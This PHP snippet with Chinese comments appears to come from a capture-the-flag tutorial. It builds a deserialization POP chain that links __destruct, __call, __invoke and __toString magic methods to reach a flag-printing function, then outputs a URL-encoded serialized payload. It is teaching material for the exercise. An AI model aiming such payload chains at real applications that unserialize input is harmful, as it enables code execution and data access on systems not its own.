[PHP] 纯文本查看 复制代码<?php
class start_gg
{
public $mod1;
public $mod2;
public function __construct()#把$mod1赋值为Call类对象
{
$this->mod1 = new Call();
}
public function __destruct()
{
$this->mod1->test1();
}
}
class Call
{
public $mod1;
public $mod2;
public function __construct()#把 $mod1赋值为funct类对象
{
$this->mod1 = new funct();
}
public function test1()
{
$this->mod1->test2();
}
}
class funct
{
public $mod1;
public $mod2;
public function __construct()#把 $mod1赋值为func类对象
{
$this->mod1= new func();
}
public function __call($test2,$arr)
{
$s1 = $this->mod1;
$s1();
}
}
class func
{
public $mod1;
public $mod2;
public function __construct()#把 $mod1赋值为string1类对象
{
$this->mod1= new string1();
}
public function __invoke()
{
$this->mod2 = "字符串拼接".$this->mod1;
}
}
class string1
{
public $str1;
public function __construct()#把 $str1赋值为GetFlag类对象
{
$this->str1= new GetFlag();
}
public function __toString()
{
$this->str1->get_flag();
return "1";
}
}
class GetFlag
{
public function get_flag()
{
echo "flag:"."xxxxxxxxxxxx";
}
}
$b = new start_gg; #构造start_gg类对象$b
echo urlencode(serialize($b))."
"; #显示输出url编码后的序列化对象
